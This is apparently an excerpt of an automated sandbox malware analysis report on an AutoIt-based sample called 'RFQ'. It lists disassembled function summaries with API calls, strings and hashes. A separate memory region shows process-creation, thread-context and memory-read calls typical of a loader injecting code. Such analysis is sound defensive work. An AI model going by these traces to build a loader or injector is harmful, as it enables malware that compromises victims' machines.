                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01066597
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2132144203.0000000001063000.00000040.00000020.00020000.00000000.sdmp, Offset: 01063000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1063000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFileFreeVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 204039940-0
                                                                                                                                                    • Opcode ID: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                                                                                                                    • Instruction ID: 09312f0b068bdae7646d22356bc915bc10f8189b40f4b1bc6e1cc8d86a09266c
                                                                                                                                                    • Opcode Fuzzy Hash: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                                                                                                                    • Instruction Fuzzy Hash: B1A10A70E00209EBDB14CFA4C895BEEBBB9FF48304F108599E645BB280DB769A45CF54

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    control_flow_graph 1130 7349fb-734a25 call 73bcce RegOpenKeyExW 1133 7a41cc-7a41e3 RegQueryValueExW 1130->1133 1134 734a2b-734a2f 1130->1134 1135 7a4246-7a424f RegCloseKey 1133->1135 1136 7a41e5-7a4222 call 74f4ea call 7347b7 RegQueryValueExW 1133->1136 1141 7a423d-7a4245 call 7347e2 1136->1141 1142 7a4224-7a423b call 736a63 1136->1142 1141->1135 1142->1141
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00734A1D
                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 007A41DB
                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 007A421A
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 007A4249
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: QueryValue$CloseOpen
                                                                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                                                    • API String ID: 1586453840-614718249
                                                                                                                                                    • Opcode ID: ea09baaebbf60d35b33d7c389c3efaf99e806c30effc3adc7d4344a7f80d6558
                                                                                                                                                    • Instruction ID: 70845e2280f4bd70d9e9e489dea121e952482dbd8444d3208f6e7add3a59cbc1
                                                                                                                                                    • Opcode Fuzzy Hash: ea09baaebbf60d35b33d7c389c3efaf99e806c30effc3adc7d4344a7f80d6558
                                                                                                                                                    • Instruction Fuzzy Hash: 10117271600108BFEB24ABA4CD86EFF7BBCEF05344F004168B502D2191EB79AE02D760

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    control_flow_graph 1157 7336b8-733728 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                    APIs
                                                                                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007336E6
                                                                                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00733707
                                                                                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,00733AA3,?), ref: 0073371B
                                                                                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,00733AA3,?), ref: 00733724
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$CreateShow
                                                                                                                                                    • String ID: AutoIt v3$edit
                                                                                                                                                    • API String ID: 1584632944-3779509399
                                                                                                                                                    • Opcode ID: 8aa67fd7e33dafcceeca057a16b9712f03eaec161ff09305ffb0916b87db8372
                                                                                                                                                    • Instruction ID: b959c3372d37a6028130953c13731ded57f2c4adb6782a3c5a0cf564f94076af
                                                                                                                                                    • Opcode Fuzzy Hash: 8aa67fd7e33dafcceeca057a16b9712f03eaec161ff09305ffb0916b87db8372
                                                                                                                                                    • Instruction Fuzzy Hash: E3F0DA715402D4BAE7319757AC08F772F7DD7C6F20F40C12EBA04A21A0D9690C95DAB5

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    control_flow_graph 1262 1066030-106619f call 1063c80 call 1065f20 CreateFileW 1269 10661a6-10661b6 1262->1269 1270 10661a1 1262->1270 1273 10661bd-10661d7 VirtualAlloc 1269->1273 1274 10661b8 1269->1274 1271 1066256-106625b 1270->1271 1275 10661db-10661f2 ReadFile 1273->1275 1276 10661d9 1273->1276 1274->1271 1277 10661f6-1066230 call 1065f60 call 1064f20 1275->1277 1278 10661f4 1275->1278 1276->1271 1283 1066232-1066247 call 1065fb0 1277->1283 1284 106624c-1066254 ExitProcess 1277->1284 1278->1271 1283->1284 1284->1271
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 01065F20: Sleep.KERNELBASE(000001F4), ref: 01065F31
                                                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01066195
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2132144203.0000000001063000.00000040.00000020.00020000.00000000.sdmp, Offset: 01063000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1063000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFileSleep
                                                                                                                                                    • String ID: IVJ7QSBPOR54HDCKVCGUTQRA
                                                                                                                                                    • API String ID: 2694422964-3692290500
                                                                                                                                                    • Opcode ID: 7e366ec23e9218ad4efc00f14ebe39b61088484ca7526974e83e58e39ffc50e2
                                                                                                                                                    • Instruction ID: 3934235ba7f691eeb0994a941c76596e43e660e128ad64326d89fd13739d2fb7
                                                                                                                                                    • Opcode Fuzzy Hash: 7e366ec23e9218ad4efc00f14ebe39b61088484ca7526974e83e58e39ffc50e2
                                                                                                                                                    • Instruction Fuzzy Hash: C1617430D04289DAEF11DBE4C854BEFBB79AF15304F044198E649BB2C1D7BA5B44CBA5

Control-flow Graph
(graph figure omitted; basic blocks 7351af-7352b0 and 7a3ca1-7a3cf7, calling 736b0f, 736a63, LoadStringW, 73510d, 734db1, 750d50, 7350e6, 750d23, Shell_NotifyIconW, 73cb37, 73518c and 736eed)
APIs
• _memset.LIBCMT ref: 0073522F
• _wcscpy.LIBCMT ref: 00735283
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00735293
• LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 007A3CB0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: IconLoadNotifyShell_String_memset_wcscpy
• String ID: Line:
• API String ID: 1053898822-1585850449
• Opcode ID: e530b4910478d1423e9dc9e1049c2d4ee84224c3cd38c37818b7f5b2c1f72736
• Instruction ID: dfc61c72cf48fcbd15c906de8b690f5d1a4d0d4ee2d8560a748484e5c5d7b9c0
• Opcode Fuzzy Hash: e530b4910478d1423e9dc9e1049c2d4ee84224c3cd38c37818b7f5b2c1f72736
• Instruction Fuzzy Hash: C73190B1108744EBE321EB60DC4AFEB77D8AB44310F40851AF58592192EB7CA648CB97
APIs
  • Part of subcall function 007341A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,007339FE,?,00000001), ref: 007341DB
• _free.LIBCMT ref: 007A36B7
• _free.LIBCMT ref: 007A36FE
  • Part of subcall function 0073C833: __wsplitpath.LIBCMT ref: 0073C93E
  • Part of subcall function 0073C833: _wcscpy.LIBCMT ref: 0073C953
  • Part of subcall function 0073C833: _wcscat.LIBCMT ref: 0073C968
  • Part of subcall function 0073C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0073C978
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
• String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
• API String ID: 805182592-1757145024
• Opcode ID: f4218894fb396381b9e27d4fbea62334e6b8da1a9751d0b8e3a27162f1f4a809
• Instruction ID: 8f37a7233e2239577daddcc1de20dc49a5c9e855a64080b4c10ecc76dac10c71
• Opcode Fuzzy Hash: f4218894fb396381b9e27d4fbea62334e6b8da1a9751d0b8e3a27162f1f4a809
• Instruction Fuzzy Hash: 13917271910219EFDF05EFA4CC559EEB7B4BF49310F104529F416AB291DB38AA15CF50
APIs
  • Part of subcall function 00735374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,007F1148,?,007361FF,?,00000000,00000001,00000000), ref: 00735392
  • Part of subcall function 007349FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00734A1D
• _wcscat.LIBCMT ref: 007A2D80
• _wcscat.LIBCMT ref: 007A2DB5
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: _wcscat$FileModuleNameOpen
• String ID: \$\Include\
• API String ID: 3592542968-2640467822
• Opcode ID: 6d8bc746680587118652562800bcd075b0876eec2846f36ff74382c013941682
• Instruction ID: e5b6cdc18b410b186354de1648548290a45ff422ad8b5d91db1017a0f60a6d44
• Opcode Fuzzy Hash: 6d8bc746680587118652562800bcd075b0876eec2846f36ff74382c013941682
• Instruction Fuzzy Hash: 45517271508344DFD314EF59D9858AAB7F8BE89300F40852EF64593263EB7C990ACB5A
APIs
• _memset.LIBCMT ref: 007A3725
• GetOpenFileNameW.COMDLG32 ref: 007A376F
  • Part of subcall function 0073660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007353B1,?,?,007361FF,?,00000000,00000001,00000000), ref: 0073662F
  • Part of subcall function 007340A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007340C6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Name$Path$FileFullLongOpen_memset
• String ID: X$t3~
• API String ID: 3777226403-4047483641
• Opcode ID: f646a77bed534a6533aa9dcb200c17c9202f4c1955a3b90f372d1c15e771459e
• Instruction ID: 09e6cac87a31146c3ec925929db3c1750afbda54279b75ccde5e517df80147ef
• Opcode Fuzzy Hash: f646a77bed534a6533aa9dcb200c17c9202f4c1955a3b90f372d1c15e771459e
• Instruction Fuzzy Hash: 8E21A871A10198EBDB05DF94D849BEE7BF89F49304F108059E405A7241DBBC6A898F65
APIs
• __getstream.LIBCMT ref: 007534FE
  • Part of subcall function 00757C0E: __getptd_noexit.LIBCMT ref: 00757C0E
• @_EH4_CallFilterFunc@8.LIBCMT ref: 00753539
• __wopenfile.LIBCMT ref: 00753549
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
• String ID: <G
• API String ID: 1820251861-2138716496
• Opcode ID: ac3f64fc4a406efd23ac5dda6a4b90a1232d3233cfc9d9690dad1a413a51d32c
• Instruction ID: 6f5f1c99f4c92784db633c509b3e8506e292260cfe5e99c5c5705e813e160c8f
• Opcode Fuzzy Hash: ac3f64fc4a406efd23ac5dda6a4b90a1232d3233cfc9d9690dad1a413a51d32c
• Instruction Fuzzy Hash: 3B11E7B0A00206DBDB56BF709C466FE36A4AF05392B148925FC15C7291FAFCCB1997B1
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0074D28B,SwapMouseButtons,00000004,?), ref: 0074D2BC
• RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0074D28B,SwapMouseButtons,00000004,?,?,?,?,0074C865), ref: 0074D2DD
• RegCloseKey.KERNELBASE(00000000,?,?,0074D28B,SwapMouseButtons,00000004,?,?,?,?,0074C865), ref: 0074D2FF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 3677997916-824357125
• Opcode ID: 26c9988c475bdd3d5ffd34f534d936d36bc4e3003a08c6590887eb5e3ac8f9dd
• Instruction ID: c40b0b5dcf9862c1cb4e4bc8752b1143b648e494b247acdce4d1ba544b9d9e18
• Opcode Fuzzy Hash: 26c9988c475bdd3d5ffd34f534d936d36bc4e3003a08c6590887eb5e3ac8f9dd
• Instruction Fuzzy Hash: E1115375611208FFDB218FA8CC88EAE7BB8EF04740F008929E841D7210E775AE40AB64
                                                                                                                                                    APIs
                                                                                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 010656DB
                                                                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01065771
                                                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01065793
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2132144203.0000000001063000.00000040.00000020.00020000.00000000.sdmp, Offset: 01063000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1063000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2438371351-0
                                                                                                                                                    • Opcode ID: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
                                                                                                                                                    • Instruction ID: 9c55838ca3b5200923f0952ee0d0488aff495b1e702dd940f9bf8c0ad84ddd98
                                                                                                                                                    • Opcode Fuzzy Hash: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
                                                                                                                                                    • Instruction Fuzzy Hash: D662FB30A14258DBEB24CFA4CC51BDEB776EF58300F1091A9D14DEB290E77A9E81CB59
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00734517: _fseek.LIBCMT ref: 0073452F
                                                                                                                                                      • Part of subcall function 0077C56D: _wcscmp.LIBCMT ref: 0077C65D
                                                                                                                                                      • Part of subcall function 0077C56D: _wcscmp.LIBCMT ref: 0077C670
                                                                                                                                                    • _free.LIBCMT ref: 0077C4DD
                                                                                                                                                    • _free.LIBCMT ref: 0077C4E4
                                                                                                                                                    • _free.LIBCMT ref: 0077C54F
                                                                                                                                                      • Part of subcall function 00751C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00757A85), ref: 00751CB1
                                                                                                                                                      • Part of subcall function 00751C9D: GetLastError.KERNEL32(00000000,?,00757A85), ref: 00751CC3
                                                                                                                                                    • _free.LIBCMT ref: 0077C557
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1552873950-0
                                                                                                                                                    • Opcode ID: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                                                                                                                    • Instruction ID: 54401c58efd7b6ffda16c1b0b1af8211e51ca79dd9c2330a6cc98d3e2a7f68f3
                                                                                                                                                    • Opcode Fuzzy Hash: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                                                                                                                    • Instruction Fuzzy Hash: F9516DB1A04218EFDF159F64DC85BADBBB9EF48304F1040AEF61DA3241DB756A908F58
                                                                                                                                                    APIs
                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 0077C72F
                                                                                                                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0077C746
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Temp$FileNamePath
                                                                                                                                                    • String ID: aut
                                                                                                                                                    • API String ID: 3285503233-3010740371
                                                                                                                                                    • Opcode ID: 0716a94fcf274ec3d917b95d069cb2182c83ac144023417bb7ae23e318fef83f
                                                                                                                                                    • Instruction ID: 1de3458799a9456a5ee7c5b992b3f35f298fe352444422311c4eb1830af4a0b5
                                                                                                                                                    • Opcode Fuzzy Hash: 0716a94fcf274ec3d917b95d069cb2182c83ac144023417bb7ae23e318fef83f
                                                                                                                                                    • Instruction Fuzzy Hash: CCD05E7150030EAFDB20AB90DC0EFCA776CA704708F0042A07650A50B2EBF8EA998B58

Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9309ab0cbf4320611284c2e206dde8ba0005ef4f2df537c9f702cc2a84c51b23
• Instruction ID: b169769ac13cdd9ad9aa952008324dbab7a8c10eba6bfb9dabdca16a2bd5d458
• Opcode Fuzzy Hash: 9309ab0cbf4320611284c2e206dde8ba0005ef4f2df537c9f702cc2a84c51b23
• Instruction Fuzzy Hash: 8BF15A71604301DFCB10EF24C895B5ABBE5FF88314F10892EF9999B292D738E905CB92

APIs
• _memset.LIBCMT ref: 00735022
• Shell_NotifyIconW.SHELL32(00000000,?), ref: 007350CB
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: IconNotifyShell__memset
• String ID:
• API String ID: 928536360-0
• Opcode ID: d1c7ac754a6729befabc57f3ed08463392a40c5ac51a7d708fc289479147835f
• Instruction ID: 3df7a7127b6e73367e2a7265298c942288afb12752b06a7002999acfbc9d0f51
• Opcode Fuzzy Hash: d1c7ac754a6729befabc57f3ed08463392a40c5ac51a7d708fc289479147835f
• Instruction Fuzzy Hash: A131D2B1604701CFD725DF34D8446ABBBE8FF48304F00492EF59A83241E77AA944CBA6

APIs
• __FF_MSGBANNER.LIBCMT ref: 00753973
  • Part of subcall function 007581C2: __NMSG_WRITE.LIBCMT ref: 007581E9
  • Part of subcall function 007581C2: __NMSG_WRITE.LIBCMT ref: 007581F3
• __NMSG_WRITE.LIBCMT ref: 0075397A
  • Part of subcall function 0075821F: GetModuleFileNameW.KERNEL32(00000000,007F0312,00000104,00000000,00000001,00000000), ref: 007582B1
  • Part of subcall function 0075821F: ___crtMessageBoxW.LIBCMT ref: 0075835F
  • Part of subcall function 00751145: ___crtCorExitProcess.LIBCMT ref: 0075114B
  • Part of subcall function 00751145: ExitProcess.KERNEL32 ref: 00751154
  • Part of subcall function 00757C0E: __getptd_noexit.LIBCMT ref: 00757C0E
• RtlAllocateHeap.NTDLL(01020000,00000000,00000001,00000001,00000000,?,?,0074F507,?,0000000E), ref: 0075399F
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
• String ID:
• API String ID: 1372826849-0
• Opcode ID: b5446ada5e2392771752b50e02de7f17076cea6e238a9cf9b0fa8fbdbefc7fa7
• Instruction ID: d924328d17ccafa1d937c84e91e70e0657a8ea0d2b959fd0870c6cc0b17df534
• Opcode Fuzzy Hash: b5446ada5e2392771752b50e02de7f17076cea6e238a9cf9b0fa8fbdbefc7fa7
• Instruction Fuzzy Hash: 31012B72244205DAE6113B24EC0ABED234C9B81797F200025FD04D72A2DBFCAD0886A0

APIs
• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0077C385,?,?,?,?,?,00000004), ref: 0077C6F2
• SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0077C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0077C708
• CloseHandle.KERNEL32(00000000,?,0077C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0077C70F
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
